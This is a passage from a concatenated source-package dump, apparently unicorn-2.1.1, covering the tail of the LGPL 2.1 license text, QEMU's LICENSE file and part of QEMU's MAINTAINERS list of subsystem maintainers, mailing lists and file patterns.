access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place. e) Verify that the user has already received a copy of these materials or that you have already sent this user a copy. 
For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the materials to be distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute. 7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things: a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above. b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work. 8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it. 10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties with this License. 11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. 
For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 13. The Free Software Foundation may publish revised and/or new versions of the Lesser General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation. 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. 
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

END OF TERMS AND CONDITIONS

How to Apply These Terms to Your New Libraries

If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License).

To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found.

    <one line to give the library's name and a brief idea of what it does.>
    Copyright (C) <year> <name of author>

    This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version.

    This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.

    You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA

Also add information on how to contact you by electronic and paper mail.

You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names:

    Yoyodyne, Inc., hereby disclaims all copyright interest in the library `Frob' (a library for tweaking knobs) written by James Random Hacker.

    <signature of Ty Coon>, 1 April 1990
    Ty Coon, President of Vice

That's all there is to it!

unicorn-2.1.1/qemu/LICENSE

The QEMU distribution includes both the QEMU emulator and various firmware files. These are separate programs that are distributed together for our users' convenience, and they have separate licenses.

The following points clarify the license of the QEMU emulator:

1) The QEMU emulator as a whole is released under the GNU General Public License, version 2.
2) Parts of the QEMU emulator have specific licenses which are compatible with the GNU General Public License, version 2. Hence each source file contains its own licensing information. Source files with no licensing information are released under the GNU General Public License, version 2 or (at your option) any later version.

As of July 2013, contributions under version 2 of the GNU General Public License (and no later version) are only accepted for the following files or directories: bsd-user/, linux-user/, hw/vfio/, hw/xen/xen_pt*.

3) The Tiny Code Generator (TCG) is mostly under the BSD or MIT licenses; but some parts may be GPLv2 or other licenses. Again, see the specific licensing information in each source file.

4) QEMU is a trademark of Fabrice Bellard.

Fabrice Bellard and the QEMU team

unicorn-2.1.1/qemu/MAINTAINERS

QEMU Maintainers
================

The intention of this file is not to establish who owns what portions of the code base, but to provide a set of names that developers can consult when they have a question about a particular subset and also to provide a set of names to be CC'd when submitting a patch to obtain appropriate review.

In general, if you have a question about inclusion of a patch, you should consult qemu-devel and not any specific individual privately.

Descriptions of section entries:

M: Mail patches to: FullName <address@domain>
   Maintainers are looking after a certain area and must be CCed on patches. They are considered the main contact point.
R: Designated reviewer: FullName <address@domain>
   These reviewers should be CCed on patches. Reviewers are familiar with the subject matter and provide feedback even though they are not maintainers.
L: Mailing list that is relevant to this area
   These lists should be CCed on patches.
W: Web-page with status/info
Q: Patchwork web based patch tracking system site
T: SCM tree type and location. Type is one of: git, hg, quilt, stgit.
S: Status, one of the following:
   Supported: Someone is actually paid to look after this.
   Maintained: Someone actually looks after it.
   Odd Fixes: It has a maintainer but they don't have time to do much other than throw the odd patch in. See below.
   Orphan: No current maintainer [but maybe you could take the role as you write your new code].
   Obsolete: Old code. Something tagged obsolete generally means it has been replaced by a better system and you should be using that.
F: Files and directories with wildcard patterns. A trailing slash includes all files and subdirectory files.
   F: drivers/net/   all files in and below drivers/net
   F: drivers/net/*  all files in drivers/net, but not below
   F: */net/*        all files in "any top level directory"/net
   One pattern per line.
Multiple F: lines acceptable. X: Files and directories that are NOT maintained, same rules as F: Files exclusions are tested before file matches. Can be useful for excluding a specific subdirectory, for instance: F: net/ X: net/ipv6/ matches all files in and below net excluding net/ipv6/ K: Keyword perl extended regex pattern to match content in a patch or file. For instance: K: of_get_profile matches patches or files that contain "of_get_profile" K: \b(printk|pr_(info|err))\b matches patches or files that contain one or more of the words printk, pr_info or pr_err One regex pattern per line. Multiple K: lines acceptable. General Project Administration ------------------------------ M: Peter Maydell <peter.maydell@linaro.org> All patches CC here L: qemu-devel@nongnu.org F: * F: */ Responsible Disclosure, Reporting Security Issues ------------------------------------------------- W: https://wiki.qemu.org/SecurityProcess M: Michael S. Tsirkin <mst@redhat.com> L: secalert@redhat.com Trivial patches --------------- Trivial patches M: Michael Tokarev <mjt@tls.msk.ru> M: Laurent Vivier <laurent@vivier.eu> S: Maintained L: qemu-trivial@nongnu.org K: ^Subject:.*(?i)trivial T: git git://git.corpit.ru/qemu.git trivial-patches T: git https://github.com/vivier/qemu.git trivial-patches Architecture support -------------------- S390 general architecture support M: Cornelia Huck <cohuck@redhat.com> S: Supported F: default-configs/s390x-softmmu.mak F: gdb-xml/s390*.xml F: hw/char/sclp*.[hc] F: hw/char/terminal3270.c F: hw/intc/s390_flic.c F: hw/intc/s390_flic_kvm.c F: hw/s390x/ F: hw/vfio/ap.c F: hw/vfio/ccw.c F: hw/watchdog/wdt_diag288.c F: include/hw/s390x/ F: include/hw/watchdog/wdt_diag288.h F: pc-bios/s390-ccw/ F: pc-bios/s390-ccw.img F: target/s390x/ F: docs/system/target-s390x.rst F: docs/system/s390x/ F: tests/migration/s390x/ K: ^Subject:.*(?i)s390x? T: git https://github.com/cohuck/qemu.git s390-next L: qemu-s390x@nongnu.org Guest CPU cores (TCG) --------------------- Overall TCG CPUs M: Richard Henderson <rth@twiddle.net> R: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: cpus.c F: exec.c F: accel/tcg/ F: accel/stubs/tcg-stub.c F: scripts/decodetree.py F: docs/devel/decodetree.rst F: include/exec/cpu*.h F: include/exec/exec-all.h F: include/exec/helper*.h F: include/exec/tb-hash.h F: include/sysemu/cpus.h F: include/sysemu/tcg.h FPU emulation M: Aurelien Jarno <aurelien@aurel32.net> M: Peter Maydell <peter.maydell@linaro.org> M: Alex Bennée <alex.bennee@linaro.org> S: Maintained F: fpu/ F: include/fpu/ F: tests/fp/ Alpha TCG CPUs M: Richard Henderson <rth@twiddle.net> S: Maintained F: target/alpha/ F: tests/tcg/alpha/ F: disas/alpha.c ARM TCG CPUs M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: target/arm/ F: tests/tcg/arm/ F: tests/tcg/aarch64/ F: hw/arm/ F: hw/cpu/a*mpcore.c F: include/hw/cpu/a*mpcore.h F: disas/arm.c F: disas/arm-a64.cc F: disas/libvixl/ F: docs/system/target-arm.rst ARM SMMU M: Eric Auger <eric.auger@redhat.com> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/smmu* F: include/hw/arm/smmu* CRIS TCG CPUs M: Edgar E. 
Iglesias <edgar.iglesias@gmail.com> S: Maintained F: target/cris/ F: hw/cris/ F: include/hw/cris/ F: tests/tcg/cris/ F: disas/cris.c HPPA (PA-RISC) TCG CPUs M: Richard Henderson <rth@twiddle.net> S: Maintained F: target/hppa/ F: hw/hppa/ F: disas/hppa.c F: hw/net/*i82596* F: include/hw/net/lasi_82596.h LM32 TCG CPUs M: Michael Walle <michael@walle.cc> S: Maintained F: target/lm32/ F: disas/lm32.c F: hw/lm32/ F: hw/*/lm32_* F: hw/*/milkymist-* F: include/hw/display/milkymist_tmu2.h F: include/hw/char/lm32_juart.h F: include/hw/lm32/ F: tests/tcg/lm32/ M68K TCG CPUs M: Laurent Vivier <laurent@vivier.eu> S: Maintained F: target/m68k/ F: disas/m68k.c MicroBlaze TCG CPUs M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: target/microblaze/ F: hw/microblaze/ F: disas/microblaze.c MIPS TCG CPUs M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> R: Aurelien Jarno <aurelien@aurel32.net> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Maintained F: target/mips/ F: default-configs/*mips* F: disas/*mips* F: docs/system/cpu-models-mips.rst.inc F: hw/intc/mips_gic.c F: hw/mips/ F: hw/misc/mips_* F: hw/timer/mips_gictimer.c F: include/hw/intc/mips_gic.h F: include/hw/mips/ F: include/hw/misc/mips_* F: include/hw/timer/mips_gictimer.h F: tests/acceptance/linux_ssh_mips_malta.py F: tests/acceptance/machine_mips_malta.py F: tests/tcg/mips/ K: ^Subject:.*(?i)mips Moxie TCG CPUs M: Anthony Green <green@moxielogic.com> S: Maintained F: target/moxie/ F: disas/moxie.c F: hw/moxie/ F: default-configs/moxie-softmmu.mak NiosII TCG CPUs M: Chris Wulff <crwulff@gmail.com> M: Marek Vasut <marex@denx.de> S: Maintained F: target/nios2/ F: hw/nios2/ F: hw/intc/nios2_iic.c F: disas/nios2.c F: default-configs/nios2-softmmu.mak OpenRISC TCG CPUs M: Stafford Horne <shorne@gmail.com> S: Odd Fixes F: target/openrisc/ F: hw/openrisc/ F: tests/tcg/openrisc/ PowerPC TCG CPUs M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Maintained F: target/ppc/ F: hw/ppc/ F: include/hw/ppc/ F: disas/ppc.c RISC-V TCG CPUs M: Palmer Dabbelt <palmer@dabbelt.com> M: Alistair Francis <Alistair.Francis@wdc.com> M: Sagar Karandikar <sagark@eecs.berkeley.edu> M: Bastian Koppelmann <kbastian@mail.uni-paderborn.de> L: qemu-riscv@nongnu.org S: Supported F: target/riscv/ F: hw/riscv/ F: include/hw/riscv/ F: linux-user/host/riscv32/ F: linux-user/host/riscv64/ RENESAS RX CPUs M: Yoshinori Sato <ysato@users.sourceforge.jp> S: Maintained F: target/rx/ S390 TCG CPUs M: Richard Henderson <rth@twiddle.net> M: David Hildenbrand <david@redhat.com> S: Maintained F: target/s390x/ F: hw/s390x/ F: disas/s390.c F: tests/tcg/s390x/ L: qemu-s390x@nongnu.org SH4 TCG CPUs M: Aurelien Jarno <aurelien@aurel32.net> S: Odd Fixes F: target/sh4/ F: hw/sh4/ F: disas/sh4.c F: include/hw/sh4/ SPARC TCG CPUs M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> M: Artyom Tarasenko <atar4qemu@gmail.com> S: Maintained F: target/sparc/ F: hw/sparc/ F: hw/sparc64/ F: include/hw/sparc/sparc64.h F: disas/sparc.c UniCore32 TCG CPUs M: Guan Xuetao <gxt@mprc.pku.edu.cn> S: Maintained F: target/unicore32/ F: hw/unicore32/ F: include/hw/unicore32/ X86 TCG CPUs M: Paolo Bonzini <pbonzini@redhat.com> M: Richard Henderson <rth@twiddle.net> M: Eduardo Habkost <ehabkost@redhat.com> S: Maintained F: target/i386/ F: tests/tcg/i386/ F: tests/tcg/x86_64/ F: hw/i386/ F: disas/i386.c F: docs/system/cpu-models-x86.rst.inc T: git https://github.com/ehabkost/qemu.git x86-next Xtensa TCG CPUs M: Max Filippov <jcmvbkbc@gmail.com> W: 
http://wiki.osll.ru/doku.php?id=etc:users:jcmvbkbc:qemu-target-xtensa S: Maintained F: target/xtensa/ F: hw/xtensa/ F: tests/tcg/xtensa/ F: disas/xtensa.c F: include/hw/xtensa/xtensa-isa.h F: default-configs/xtensa*.mak TriCore TCG CPUs M: Bastian Koppelmann <kbastian@mail.uni-paderborn.de> S: Maintained F: target/tricore/ F: hw/tricore/ F: include/hw/tricore/ Multiarch Linux User Tests M: Alex Bennée <alex.bennee@linaro.org> S: Maintained F: tests/tcg/multiarch/ Guest CPU Cores (KVM) --------------------- Overall KVM CPUs M: Paolo Bonzini <pbonzini@redhat.com> L: kvm@vger.kernel.org S: Supported F: */kvm.* F: accel/kvm/ F: accel/stubs/kvm-stub.c F: include/hw/kvm/ F: include/sysemu/kvm*.h F: scripts/kvm/kvm_flightrecorder ARM KVM CPUs M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: target/arm/kvm.c MIPS KVM CPUs M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> S: Odd Fixes F: target/mips/kvm.c PPC KVM CPUs M: David Gibson <david@gibson.dropbear.id.au> S: Maintained F: target/ppc/kvm.c S390 KVM CPUs M: Halil Pasic <pasic@linux.ibm.com> M: Cornelia Huck <cohuck@redhat.com> M: Christian Borntraeger <borntraeger@de.ibm.com> S: Supported F: target/s390x/kvm.c F: target/s390x/kvm_s390x.h F: target/s390x/kvm-stub.c F: target/s390x/ioinst.[ch] F: target/s390x/machine.c F: target/s390x/sigp.c F: target/s390x/cpu_features*.[ch] F: target/s390x/cpu_models.[ch] F: hw/intc/s390_flic.c F: hw/intc/s390_flic_kvm.c F: include/hw/s390x/s390_flic.h F: gdb-xml/s390*.xml T: git https://github.com/cohuck/qemu.git s390-next T: git https://github.com/borntraeger/qemu.git s390-next L: qemu-s390x@nongnu.org X86 KVM CPUs M: Paolo Bonzini <pbonzini@redhat.com> M: Marcelo Tosatti <mtosatti@redhat.com> L: kvm@vger.kernel.org S: Supported F: target/i386/kvm.c F: scripts/kvm/vmxcap X86 HVF CPUs M: Roman Bolshakov <r.bolshakov@yadro.com> S: Maintained F: accel/stubs/hvf-stub.c F: target/i386/hvf/ F: include/sysemu/hvf.h WHPX CPUs M: Sunil Muthuswamy <sunilmut@microsoft.com> S: Supported F: target/i386/whpx-all.c F: target/i386/whp-dispatch.h F: accel/stubs/whpx-stub.c F: include/sysemu/whpx.h Guest CPU Cores (Xen) --------------------- X86 Xen CPUs M: Stefano Stabellini <sstabellini@kernel.org> M: Anthony Perard <anthony.perard@citrix.com> M: Paul Durrant <paul@xen.org> L: xen-devel@lists.xenproject.org S: Supported F: */xen* F: hw/9pfs/xen-9p* F: hw/char/xen_console.c F: hw/display/xenfb.c F: hw/net/xen_nic.c F: hw/usb/xen-usb.c F: hw/block/xen* F: hw/block/dataplane/xen* F: hw/xen/ F: hw/xenpv/ F: hw/i386/xen/ F: hw/pci-host/xen_igd_pt.c F: include/hw/block/dataplane/xen* F: include/hw/xen/ F: include/sysemu/xen-mapcache.h Guest CPU Cores (HAXM) --------------------- X86 HAXM CPUs M: Wenchao Wang <wenchao.wang@intel.com> M: Colin Xu <colin.xu@intel.com> L: haxm-team@intel.com W: https://github.com/intel/haxm/issues S: Maintained F: include/sysemu/hax.h F: target/i386/hax-* Hosts ----- LINUX M: Michael S. 
Tsirkin <mst@redhat.com> M: Cornelia Huck <cohuck@redhat.com> M: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: linux-headers/ F: scripts/update-linux-headers.sh POSIX M: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: os-posix.c F: include/sysemu/os-posix.h F: util/*posix*.c F: include/qemu/*posix*.h NETBSD M: Kamil Rytarowski <kamil@netbsd.org> S: Maintained K: ^Subject:.*(?i)NetBSD OPENBSD M: Brad Smith <brad@comstyle.com> S: Maintained K: ^Subject:.*(?i)OpenBSD W32, W64 M: Stefan Weil <sw@weilnetz.de> S: Maintained F: *win32* F: */*win32* F: include/*/*win32* X: qga/*win32* F: qemu.nsi Alpha Machines -------------- M: Richard Henderson <rth@twiddle.net> S: Maintained F: hw/alpha/ F: hw/isa/smc37c669-superio.c F: tests/tcg/alpha/system/ ARM Machines ------------ Allwinner-a10 M: Beniamino Galvani <b.galvani@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/*/allwinner* F: include/hw/*/allwinner* F: hw/arm/cubieboard.c Allwinner-h3 M: Niek Linnenbank <nieklinnenbank@gmail.com> L: qemu-arm@nongnu.org S: Maintained F: hw/*/allwinner-h3* F: include/hw/*/allwinner-h3* F: hw/arm/orangepi.c F: docs/system/orangepi.rst ARM PrimeCell and CMSDK devices M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/char/pl011.c F: include/hw/char/pl011.h F: hw/display/pl110* F: hw/dma/pl080.c F: include/hw/dma/pl080.h F: hw/dma/pl330.c F: hw/gpio/pl061.c F: hw/input/pl050.c F: hw/intc/pl190.c F: hw/sd/pl181.c F: hw/ssi/pl022.c F: include/hw/ssi/pl022.h F: hw/rtc/pl031.c F: include/hw/rtc/pl031.h F: include/hw/arm/primecell.h F: hw/timer/cmsdk-apb-timer.c F: include/hw/timer/cmsdk-apb-timer.h F: hw/timer/cmsdk-apb-dualtimer.c F: include/hw/timer/cmsdk-apb-dualtimer.h F: hw/char/cmsdk-apb-uart.c F: include/hw/char/cmsdk-apb-uart.h F: hw/watchdog/cmsdk-apb-watchdog.c F: include/hw/watchdog/cmsdk-apb-watchdog.h F: hw/misc/tz-ppc.c F: include/hw/misc/tz-ppc.h F: hw/misc/tz-mpc.c F: include/hw/misc/tz-mpc.h F: hw/misc/tz-msc.c F: include/hw/misc/tz-msc.h ARM cores M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/intc/arm* F: hw/intc/gic_internal.h F: hw/misc/a9scu.c F: hw/misc/arm11scu.c F: hw/misc/arm_l2x0.c F: hw/timer/a9gtimer* F: hw/timer/arm* F: include/hw/arm/arm*.h F: include/hw/intc/arm* F: include/hw/misc/a9scu.h F: include/hw/misc/arm11scu.h F: include/hw/timer/a9gtimer.h F: include/hw/timer/arm_mptimer.h F: include/hw/timer/armv7m_systick.h F: tests/qtest/test-arm-mptimer.c Exynos M: Igor Mitsyanko <i.mitsyanko@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/*/exynos* F: include/hw/arm/exynos4210.h Calxeda Highbank M: Rob Herring <robh@kernel.org> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/highbank.c F: hw/net/xgmac.c Canon DIGIC M: Antony Pavlov <antonynpavlov@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: include/hw/arm/digic.h F: hw/*/digic* F: include/hw/*/digic* Goldfish RTC M: Anup Patel <anup.patel@wdc.com> M: Alistair Francis <Alistair.Francis@wdc.com> L: qemu-riscv@nongnu.org S: Maintained F: hw/rtc/goldfish_rtc.c F: include/hw/rtc/goldfish_rtc.h Gumstix M: Peter Maydell <peter.maydell@linaro.org> R: Philippe Mathieu-Daudé <f4bug@amsat.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/gumstix.c i.MX25 PDK M: Peter Maydell <peter.maydell@linaro.org> R: Jean-Christophe Dubois <jcd@tribudubois.net> L: qemu-arm@nongnu.org S: Odd 
Fixes F: hw/arm/fsl-imx25.c F: hw/arm/imx25_pdk.c F: hw/misc/imx25_ccm.c F: include/hw/arm/fsl-imx25.h F: include/hw/misc/imx25_ccm.h i.MX31 (kzm) M: Peter Chubb <peter.chubb@nicta.com.au> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/kzm.c F: hw/*/imx_* F: hw/*/*imx31* F: include/hw/*/imx_* F: include/hw/*/*imx31* Integrator CP M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/integratorcp.c F: hw/misc/arm_integrator_debug.c F: include/hw/misc/arm_integrator_debug.h F: tests/acceptance/machine_arm_integratorcp.py F: docs/system/arm/integratorcp.rst MCIMX6UL EVK / i.MX6ul M: Peter Maydell <peter.maydell@linaro.org> R: Jean-Christophe Dubois <jcd@tribudubois.net> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/mcimx6ul-evk.c F: hw/arm/fsl-imx6ul.c F: hw/misc/imx6ul_ccm.c F: include/hw/arm/fsl-imx6ul.h F: include/hw/misc/imx6ul_ccm.h MCIMX7D SABRE / i.MX7 M: Peter Maydell <peter.maydell@linaro.org> R: Andrey Smirnov <andrew.smirnov@gmail.com> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/mcimx7d-sabre.c F: hw/arm/fsl-imx7.c F: hw/misc/imx7_*.c F: include/hw/arm/fsl-imx7.h F: include/hw/misc/imx7_*.h F: hw/pci-host/designware.c F: include/hw/pci-host/designware.h MPS2 M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/mps2.c F: hw/arm/mps2-tz.c F: hw/misc/mps2-*.c F: include/hw/misc/mps2-*.h F: hw/arm/armsse.c F: include/hw/arm/armsse.h F: hw/misc/iotkit-secctl.c F: include/hw/misc/iotkit-secctl.h F: hw/misc/iotkit-sysctl.c F: include/hw/misc/iotkit-sysctl.h F: hw/misc/iotkit-sysinfo.c F: include/hw/misc/iotkit-sysinfo.h F: hw/misc/armsse-cpuid.c F: include/hw/misc/armsse-cpuid.h F: hw/misc/armsse-mhu.c F: include/hw/misc/armsse-mhu.h Musca M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/musca.c Musicpal M: Jan Kiszka <jan.kiszka@web.de> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/musicpal.c F: docs/system/arm/musicpal.rst nSeries M: Andrzej Zaborowski <balrogg@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/nseries.c F: hw/display/blizzard.c F: hw/input/lm832x.c F: hw/input/tsc2005.c F: hw/misc/cbus.c F: hw/rtc/twl92230.c F: include/hw/display/blizzard.h F: include/hw/input/tsc2xxx.h F: include/hw/misc/cbus.h F: tests/acceptance/machine_arm_n8x0.py F: docs/system/arm/nseries.rst Palm M: Andrzej Zaborowski <balrogg@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/palm.c F: hw/input/tsc210x.c F: include/hw/input/tsc2xxx.h F: docs/system/arm/palm.rst Raspberry Pi M: Peter Maydell <peter.maydell@linaro.org> R: Andrew Baumann <Andrew.Baumann@microsoft.com> R: Philippe Mathieu-Daudé <f4bug@amsat.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/raspi.c F: hw/arm/raspi_platform.h F: hw/*/bcm283* F: include/hw/arm/raspi* F: include/hw/*/bcm283* Real View M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/realview* F: hw/cpu/realview_mpcore.c F: hw/intc/realview_gic.c F: include/hw/intc/realview_gic.h F: docs/system/arm/realview.rst PXA2XX M: Andrzej Zaborowski <balrogg@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/mainstone.c F: hw/arm/spitz.c F: hw/arm/tosa.c F: hw/arm/z2.c F: hw/*/pxa2xx* F: hw/display/tc6393xb.c F: hw/gpio/max7310.c F: hw/gpio/zaurus.c F: hw/misc/mst_fpga.c F: 
hw/misc/max111x.c F: include/hw/arm/pxa.h F: include/hw/arm/sharpsl.h F: include/hw/display/tc6393xb.h F: docs/system/arm/xscale.rst SABRELITE / i.MX6 M: Peter Maydell <peter.maydell@linaro.org> R: Jean-Christophe Dubois <jcd@tribudubois.net> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/sabrelite.c F: hw/arm/fsl-imx6.c F: hw/misc/imx6_*.c F: hw/ssi/imx_spi.c F: hw/usb/imx-usb-phy.c F: include/hw/usb/imx-usb-phy.h F: include/hw/arm/fsl-imx6.h F: include/hw/misc/imx6_*.h F: include/hw/ssi/imx_spi.h SBSA-REF M: Radoslaw Biernacki <radoslaw.biernacki@linaro.org> M: Peter Maydell <peter.maydell@linaro.org> R: Leif Lindholm <leif@nuviainc.com> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/sbsa-ref.c Sharp SL-5500 (Collie) PDA M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/collie.c F: hw/arm/strongarm* Stellaris M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/stellaris* F: include/hw/input/gamepad.h F: docs/system/arm/stellaris.rst Versatile Express M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/vexpress.c Versatile PB M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/versatile* F: hw/misc/arm_sysctl.c F: docs/system/arm/versatile.rst Virt M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/virt* F: include/hw/arm/virt.h Xilinx Zynq M: Edgar E. Iglesias <edgar.iglesias@gmail.com> M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/xilinx_* F: hw/*/cadence_* F: hw/misc/zynq* F: include/hw/misc/zynq* X: hw/ssi/xilinx_* Xilinx 